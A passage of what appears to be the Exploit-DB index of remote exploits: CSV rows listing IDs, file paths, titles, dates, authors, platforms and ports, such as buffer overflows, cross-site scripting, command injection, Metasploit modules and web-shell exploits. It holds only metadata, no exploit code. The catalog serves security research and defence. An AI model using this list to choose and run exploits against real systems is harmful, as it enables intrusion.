PBX 0.7.x - Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote, -24223,exploits/linux/remote/24223.py,"Rlpr 2.0 - 'msg()' Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote, -24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",multiple,remote, -24226,exploits/hardware/remote/24226.txt,"D-Link AirPlus DI-614+ / DI-624 / DI-704 - DHCP Log HTML Injection",2004-06-21,c3rb3r,hardware,remote, -24246,exploits/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",multiple,remote, -24249,exploits/windows/remote/24249.html,"Microsoft Internet Explorer 6 - Shell.Application Object Script Execution",2004-07-03,http-equiv,windows,remote, -24250,exploits/multiple/remote/24250.pl,"MySQL 4.1/5.0 - Authentication Bypass",2004-07-05,"Eli Kara",multiple,remote, -24253,exploits/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting",2004-07-05,"Donato Ferrante",multiple,remote, -24259,exploits/linux/remote/24259.c,"Ethereal 0.x - Multiple iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote, -24262,exploits/windows/remote/24262.html,"Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation",2004-07-08,"bitlance winter",windows,remote, -24263,exploits/windows/remote/24263.txt,"Mozilla 1.7 - External Protocol Handler",2004-07-08,"Keith McCanless",windows,remote, -24264,exploits/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - 'Font.createFont' Method Insecure Temporary File Creation",2004-07-09,Jelmer,multiple,remote, -24265,exploits/windows/remote/24265.html,"Microsoft Internet Explorer 5.0.1 - JavaScript Method Assignment Cross-Domain Scripting",2004-07-12,Paul,windows,remote, -24266,exploits/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 - Popup.show Mouse Event Hijacking",2004-07-12,Paul,windows,remote, -24268,exploits/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 - 'errormsg' Cross-Site Scripting",2004-07-12,dr_insane,multiple,remote, -24272,exploits/multiple/remote/24272.rb,"Jenkins - Script-Console Java Execution (Metasploit)",2013-01-21,Metasploit,multiple,remote, -24273,exploits/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution (Metasploit)",2013-01-21,Metasploit,php,remote, -24276,exploits/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File - Multiple Vulnerabilities",2004-07-13,"Mind Warper",windows,remote, -24280,exploits/php/remote/24280.txt,"PHP 4.x/5.0 - 'Strip_Tags()' Function Bypass",2004-07-14,"Stefan Esser",php,remote, -24297,exploits/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass",2004-07-21,"Noam Rathaus",windows,remote, -24304,exploits/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote, -24308,exploits/multiple/remote/24308.rb,"Java Applet - Method Handle Remote Code Execution (Metasploit)",2013-01-24,Metasploit,multiple,remote, -24309,exploits/java/remote/24309.rb,"Java Applet - AverageRangeStatisticImpl Remote Code Execution (Metasploit)",2013-01-24,Metasploit,java,remote, -24310,exploits/unix/remote/24310.rb,"ZoneMinder Video Server - packageControl Command Execution (Metasploit)",2013-01-24,Metasploit,unix,remote, -24312,exploits/linux/remote/24312.html,"Mozilla Browser 0.8/0.9/1.x - Refresh Security Property Spoofing",2004-07-26,E.Kellinis,linux,remote, -24321,exploits/multiple/remote/24321.rb,"Movable Type 4.2x/4.3x - Web Upgrade Remote Code Execution (Metasploit)",2013-01-07,Metasploit,multiple,remote, -24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,multiple,remote, -24323,exploits/multiple/remote/24323.rb,"Novell eDirectory 8 - Remote Buffer Overflow (Metasploit)",2013-01-24,Metasploit,multiple,remote, -24325,exploits/multiple/remote/24325.html,"Opera Web Browser 7.53 - Location Replace URI Obfuscation",2004-07-27,"bitlance winter",multiple,remote, -24326,exploits/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote, -24327,exploits/cgi/remote/24327.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote, -24328,exploits/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 - Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote, -24336,exploits/cgi/remote/24336.txt,"MyServer 0.6.2 - 'math_sum.mscgi' Multiple Cross-Site Scripting Vulnerabilities",2004-07-30,dr_insane,cgi,remote, -24337,exploits/cgi/remote/24337.txt,"myServer 0.6.2 - 'math_sum.mscgi' Multiple Remote Overflows",2004-07-30,dr_insane,cgi,remote, -24338,exploits/linux/remote/24338.c,"Citadel/UX 5.9/6.x - 'Username' Remote Buffer Overflow (1)",2004-07-30,CoKi,linux,remote, -24339,exploits/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Remote Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote, -24342,exploits/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote, -24345,exploits/windows/remote/24345.txt,"IBM Tivoli Directory Server 3.2.2/4.1 - LDACGI Directory Traversal",2004-08-02,anonymous,windows,remote, -24350,exploits/windows/remote/24350.txt,"Acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,windows,remote, -24353,exploits/unix/remote/24353.sql,"Oracle 9i - Multiple Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote, -24354,exploits/windows/remote/24354.txt,"Microsoft Internet Explorer 6 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",windows,remote, -24361,exploits/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,linux,remote, -24363,exploits/windows/remote/24363.txt,"clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",windows,remote, -24376,exploits/multiple/remote/24376.txt,"Opera Web Browser 7.5 - Resource Detection",2004-07-17,"GreyMagic Software",multiple,remote, -24387,exploits/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 - HTML Injection",2004-08-20,"Audun Larsen",multiple,remote, -24404,exploits/windows/remote/24404.txt,"Gadu-Gadu 6.0 - File Download Filename Obfuscation",2004-08-23,"Bartosz Kwitkowski",windows,remote, -24407,exploits/windows/remote/24407.txt,"Microsoft Internet Explorer 6 - Resource Detection",2004-08-24,"GreyMagic Software",windows,remote, -24409,exploits/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized Proxy Relay",2002-12-11,Texonet,windows,remote, -24413,exploits/windows/remote/24413.txt,"NullSoft Winamp 2.4 < 5.0.4 - '.wsz' Remote Code Execution",2004-07-26,anonymous,windows,remote, -24414,exploits/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant",2004-08-26,"GulfTech Security",multiple,remote, -24417,exploits/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote, -24418,exploits/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote, -24419,exploits/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote, -24460,exploits/windows/remote/24460.rb,"VMware OVF Tools - Format String (Metasploit) (1)",2013-02-06,Metasploit,windows,remote, -24434,exploits/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution (Metasploit)",2013-01-29,Metasploit,multiple,remote, -24444,exploits/php/remote/24444.rb,"DataLife Engine - 'preview.php' PHP Code Injection (Metasploit)",2013-02-01,Metasploit,php,remote, -24455,exploits/unix/remote/24455.rb,"Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)",2013-02-05,Metasploit,unix,remote, -24461,exploits/windows/remote/24461.rb,"VMware OVF Tools - Format String (Metasploit) (2)",2013-02-12,Metasploit,windows,remote, -24467,exploits/windows/remote/24467.rb,"ActFax 5.01 - RAW Server (Metasploit)",2013-02-07,"Craig Freyman",windows,remote, -24479,exploits/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Remote Buffer Overflow",2013-02-11,superkojiman,windows,remote, -24490,exploits/windows/remote/24490.rb,"Novell Groupwise Client - 'gwcls1.dll' ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,windows,remote, -24494,exploits/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 -24495,exploits/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote, -24502,exploits/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,windows,remote, -24526,exploits/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote, -24527,exploits/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote, -24528,exploits/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote, -24529,exploits/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,php,remote, -24538,exploits/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,windows,remote, -24539,exploits/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (2)",2013-02-25,Metasploit,multiple,remote, -24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote, -24548,exploits/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote, -24549,exploits/php/remote/24549.rb,"PolarPearCMS - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-26,Metasploit,php,remote, -24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote, -24567,exploits/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",multiple,remote, -24568,exploits/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote, -24571,exploits/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote, -24572,exploits/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 - Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote, -24720,exploits/windows/remote/24720.txt,"Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",windows,remote, -24581,exploits/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 - Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote, -24584,exploits/windows/remote/24584.c,"Cerulean Studios Trillian Client 0.74 MSN Module - Remote Buffer Overflow",2004-09-08,Komrade,windows,remote, -24598,exploits/multiple/remote/24598.txt,"SnipSnap 0.5.2 - HTTP Response Splitting",2004-09-14,"Maestro De-Seguridad",multiple,remote, -24600,exploits/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal",2004-09-15,scrap,windows,remote, -24607,exploits/windows/remote/24607.txt,"Google Toolbar 1.1.x - About.HTML HTML Injection",2004-09-17,ViperSV,windows,remote, -24622,exploits/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow",2004-09-21,"D. J. Bernstein",linux,remote, -24623,exploits/windows/remote/24623.txt,"Sophos Anti-Virus 3.x - Reserved MS-DOS Name Scan Evasion",2004-09-22,"Kurt Seifried",windows,remote, -24624,exploits/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server - Multiple Command Remote Overflows",2004-09-16,D_BuG,windows,remote, -24653,exploits/windows/remote/24653.txt,"VyPRESS Messenger 3.5 - Remote Buffer Overflow",2004-10-01,"Luigi Auriemma",windows,remote, -24654,exploits/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation",2004-10-04,"Eric Lackey",multiple,remote, -24656,exploits/php/remote/24656.txt,"PHP 4.x/5.0.1 - PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",php,remote, -24669,exploits/linux/remote/24669.txt,"MySQL 3.x/4.x - ALTER TABLE/RENAME Forces Old Permission Checks",2004-10-08,"Oleksandr Byelkin",linux,remote, -24681,exploits/hardware/remote/24681.txt,"3Com 3CRADSL72 ADSL Wireless Router - Information Disclosure / Authentication Bypass",2004-10-13,Karb0nOxyde,hardware,remote, -24686,exploits/windows/remote/24686.txt,"Microsoft Outlook 2003 - Security Policy Bypass",2004-10-18,http-equiv,windows,remote, -24687,exploits/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Plaintext Email Security Policy Bypass",2004-10-18,http-equiv,windows,remote, -24688,exploits/windows/remote/24688.pl,"best software SalesLogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote, -24693,exploits/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038)",2004-10-20,http-equiv,windows,remote, -24977,exploits/linux/remote/24977.txt,"CUPS 1.1.x - '.HPGL' File Processor Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote, -24978,exploits/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",linux,remote, -24701,exploits/multiple/remote/24701.txt,"OpenWFE 1.4.x - Cross-Site Scripting / Connection Proxy",2004-10-25,"Joxean Koret",multiple,remote, -24704,exploits/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote, -24707,exploits/multiple/remote/24707.txt,"Google Desktop Search - Cross-Site Scripting",2004-10-26,"Salvatore Aranzulla",multiple,remote, -24890,exploits/windows/remote/24890.rb,"ActFax 5.01 - RAW Server Buffer Overflow (Metasploit)",2013-03-26,Metasploit,windows,remote, -24711,exploits/php/remote/24711.php,"PHP 4.x/5 - cURL 'open_basedir' Restriction Bypass",2004-10-28,FraMe,php,remote, -24712,exploits/windows/remote/24712.txt,"Microsoft Internet Explorer 6 - TABLE Status Bar URI Obfuscation",2004-10-28,"Benjamin Tobias Franz",windows,remote, -24713,exploits/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 - IP Filter Bypass",2004-10-29,anonymous,multiple,remote, -24714,exploits/windows/remote/24714.txt,"Microsoft Internet Explorer 6 - HTML Form Tags URI Obfuscation",2004-10-30,http-equiv,windows,remote, -24716,exploits/osx/remote/24716.txt,"Apple Safari 1.2 Web Browser - TABLE Status Bar URI Obfuscation",2004-11-01,"Gilbert Verdian",osx,remote, -24724,exploits/multiple/remote/24724.c,"Monolith Lithtech Game Engine - Multiple Remote Format String Vulnerabilities",2004-11-05,"Luigi Auriemma",multiple,remote, -24725,exploits/multiple/remote/24725.php,"Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure",2004-11-05,DokFLeed,multiple,remote, -24727,exploits/windows/remote/24727.txt,"Microsoft Internet Explorer 6 - Local Resource Enumeration",2004-11-08,"Benjamin Tobias Franz",windows,remote, -24728,exploits/windows/remote/24728.txt,"Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote, -24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote, -24745,exploits/windows/remote/24745.rb,"Honeywell HSC Remote Deployer - ActiveX Remote Code Execution (Metasploit)",2013-03-13,Metasploit,windows,remote, -24760,exploits/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",hardware,remote, -24767,exploits/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Remote Buffer Overflow",2004-11-23,"Luigi Auriemma",windows,remote, -24774,exploits/multiple/remote/24774.java,"Open DC Hub 0.7.14 - Remote Buffer Overflow",2004-11-24,"Donato Ferrante",multiple,remote, -24784,exploits/linux/remote/24784.txt,"File ELF 4.x - Header Buffer Overflow",2004-11-29,anonymous,linux,remote, -24813,exploits/linux/remote/24813.pl,"GNU Wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote, -24794,exploits/linux/remote/24794.sh,"SCPOnly 2.x/3.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote, -24795,exploits/linux/remote/24795.txt,"RSSH 2.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote, -24800,exploits/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 - FTP URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",windows,remote, -24801,exploits/linux/remote/24801.txt,"KDE FTP - KIOSlave URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",linux,remote, -24802,exploits/windows/remote/24802.txt,"Microsoft Internet Explorer 6 - Sysimage Protocol Handler Local File Detection",2004-12-07,"Gregory R. Panakkal",windows,remote, -24808,exploits/windows/remote/24808.txt,"Microsoft Internet Explorer 6 - Search Pane URI Obfuscation",2004-12-08,http-equiv,windows,remote, -24811,exploits/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 - 'FSMSH.dll' CGI Application Installation Full Path Disclosure",2004-12-09,oliver@greyhat.de,windows,remote, -24852,exploits/linux/remote/24852.txt,"MPG123 0.59 - Find Next File Remote Client-Side Buffer Overflow",2004-12-15,"Bartlomiej Sieka",linux,remote, -24853,exploits/linux/remote/24853.c,"MPlayer 0.9/1.0 - MMST Get_Header Remote Client-Side Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote, -24848,exploits/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote, -24856,exploits/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote, -24857,exploits/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote, -24874,exploits/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,multiple,remote, -24875,exploits/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote, -24876,exploits/windows/remote/24876.rb,"Cool PDF Image Stream - Remote Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote, -24886,exploits/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,windows,remote, -24887,exploits/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,windows,remote, -24888,exploits/linux/remote/24888.rb,"Mutiny - Remote Command Execution (Metasploit)",2013-03-25,Metasploit,linux,remote, -24891,exploits/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload (Metasploit)",2013-03-26,Metasploit,windows,remote, -24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",hardware,remote, -24897,exploits/windows/remote/24897.rb,"KNet Web Server 1.04b - Remote Buffer Overflow (SEH)",2013-03-29,"Myo Soe",windows,remote, -24943,exploits/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Remote Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote, -24955,exploits/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)",2013-04-12,Metasploit,linux,remote,5666 -24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote, -24903,exploits/php/remote/24903.rb,"STUNSHELL (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote, -24904,exploits/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote, -24905,exploits/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote, -24907,exploits/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote, -24931,exploits/hardware/remote/24931.rb,"NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote, -24935,exploits/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote, -24936,exploits/hardware/remote/24936.rb,"Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote, -24937,exploits/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote, -24938,exploits/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote, -24950,exploits/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote, -643,exploits/windows/remote/643.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110 -646,exploits/windows/remote/646.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote, -24944,exploits/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote, -24945,exploits/hardware/remote/24945.rb,"Linksys WRT54GL - 'apply.cgi' Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote, -24946,exploits/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)",2013-04-10,Metasploit,multiple,remote, -24947,exploits/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote, -24956,exploits/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote, -24958,exploits/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Remote Buffer Overflow",2013-04-15,superkojiman,windows,remote, -24961,exploits/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote, -24963,exploits/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000 -25091,exploits/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote, -24974,exploits/hardware/remote/24974.rb,"NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,hardware,remote, -24976,exploits/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,multiple,remote, -24979,exploits/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote, -24980,exploits/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote, -24981,exploits/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",multiple,remote, -24982,exploits/multiple/remote/24982.txt,"Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote, -24983,exploits/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote, -24984,exploits/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Remote Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote, -24985,exploits/php/remote/24985.txt,"PHP 4/5 - 'addslashes()' Null Byte Bypass",2004-12-16,"Daniel Fabian",php,remote, -24995,exploits/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",multiple,remote, -24996,exploits/windows/remote/24996.rb,"SAP ConfigServlet - Unauthenticated Remote Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",windows,remote, -25187,exploits/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal",2005-03-03,"Kristof Philipsen",windows,remote, -25188,exploits/windows/remote/25188.txt,"Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure",2005-02-19,upken,windows,remote, -25190,exploits/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote, -25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",multiple,remote, -25194,exploits/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote, -29277,exploits/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote, -24999,exploits/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote, -25294,exploits/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,windows,remote, -25001,exploits/linux/remote/25001.rb,"GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote, -25005,exploits/linux/remote/25005.txt,"NASM 0.98.x - Error Preprocessor Directive Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,remote, -25006,exploits/linux/remote/25006.txt,"RTF2LATEX2E 1.0 - Remote Stack Buffer Overflow",2004-12-16,"Limin Wang",linux,remote, -25008,exploits/linux/remote/25008.txt,"LinPopUp 1.2 - Remote Buffer Overflow",2004-12-15,"Stephen Dranger",linux,remote, -25009,exploits/windows/remote/25009.txt,"Gadu-Gadu 6.0 - URL Parser JavaScript Cross-Site Scripting",2004-12-17,"Jaroslaw Sajko",windows,remote, -25010,exploits/linux/remote/25010.txt,"O3Read 0.0.3 - HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",linux,remote, -25011,exploits/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow",2004-12-15,"Matthew Dabrowski",multiple,remote, -25013,exploits/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 - Arbitrary Application Execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote, -25015,exploits/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 - '.EMelody' File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",linux,remote, -25016,exploits/windows/remote/25016.txt,"ASP2PHP 0.76.23 - Preparse Token Variable Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote, -25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote, -25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",multiple,remote, -25020,exploits/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 - '.FRM' File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote, -25021,exploits/windows/remote/25021.txt,"ABCPP 1.3 - Directive Handler Buffer Overflow",2004-12-15,"Yosef Klein",windows,remote, -25022,exploits/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 - '.ABC' File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote, -25023,exploits/windows/remote/25023.txt,"PGN2WEB 0.3 - Remote Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote, -25025,exploits/windows/remote/25025.txt,"ABC2PS/JCABC2PS 1.2 - Voice Field Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote, -25026,exploits/windows/remote/25026.txt,"Mesh Viewer 0.2.2 - Remote Buffer 